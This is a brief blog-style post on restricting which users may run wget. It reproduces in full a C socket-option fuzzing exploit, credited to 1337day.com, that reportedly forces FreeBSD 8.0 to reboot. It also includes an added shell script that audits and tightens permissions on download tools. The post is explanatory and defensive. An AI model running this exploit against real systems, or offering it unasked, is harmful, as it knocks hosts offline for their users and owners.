Linux Capabilities.
This is really a matter of permissions, but we often forget the small things, and the impact of a forgotten trivial problem can be very large. As I wrote before, "wget" makes things easy but can also be a disaster. Why a disaster? Because if you allow a normal user to run wget, he can use your server as a server for downloading, or he can download exploits that can be used to damage the system and seize the "root" user on your system.
Here is example code that I took from 1337day.com; it can force FreeBSD 8.0 to reboot if an attacker runs it on your system.
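#include <stdio.h>        /* printf */
#include <sys/types.h>
#include <sys/socket.h>   /* socket, setsockopt, getsockopt */
#define PAGE_SIZE 4096

int main(void) {
    int k,fd,i2,i3,i4,i5,i6,i7,i8;
    char *p;
    char buf[4096];

    /* Try every combination of socket domain, type and protocol. */
    for (i2=0;i2<256;i2++) {
        for (i3=0;i3<2;i3++) {
            for (i4=0;i4<2;i4++) {
                fd = socket(i2, i3, i4);
                if (fd < 0) continue;
                printf("SUCCESS!\n");
                /* On each socket that opens, walk option levels and names. */
                for (i5=0;i5<100;i5++) {
                    for (i6=0;i6<100;i6++) {
                        setsockopt(fd, i5, i6, buf, 4);
                        getsockopt(fd, i5, i6, buf, &i7);
                    }
                }
            }
        }
    }
    return 0;
}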
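An audit for the permission problem described above, as an added example that is not part of the original post: it reports whether users outside the owner and group can execute download tools, and shows a restricted mode. The tool list beyond wget, the AUDIT_DIR variable, the function names and the group name in the comment are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): check whether "other" users
# may execute download tools, and restrict them to owner and group.

# world_exec FILE -> status 0 if the "other" class has the execute bit.
# find -perm reads the mode bits themselves, so the answer is the same
# when the audit runs as root; -L resolves symlinked binaries.
world_exec() {
    [ -n "$(find -L "$1" -prune -type f -perm -001 2>/dev/null)" ]
}

# audit_tools DIR TOOL... -> one line per tool that exists in DIR.
audit_tools() {
    dir=$1; shift
    for tool in "$@"; do
        path="$dir/$tool"
        [ -e "$path" ] || continue
        if world_exec "$path"; then
            echo "EXPOSED $path"
        else
            echo "RESTRICTED $path"
        fi
    done
}

# restrict_tool FILE [GROUP] -> mode 750, optionally handing the file to a
# dedicated group (for example a hypothetical "netdl" group of trusted users).
restrict_tool() {
    [ -n "${2:-}" ] && chgrp "$2" "$1"
    chmod 750 "$1"
}

# Read-only audit of the real system; only wget is named on the page,
# curl and fetch are assumed additions to the list.
audit_tools "${AUDIT_DIR:-/usr/bin}" wget curl fetch
```

Mode bits on wget close only one path, so the same audit should cover every other download tool and interpreter installed on the host.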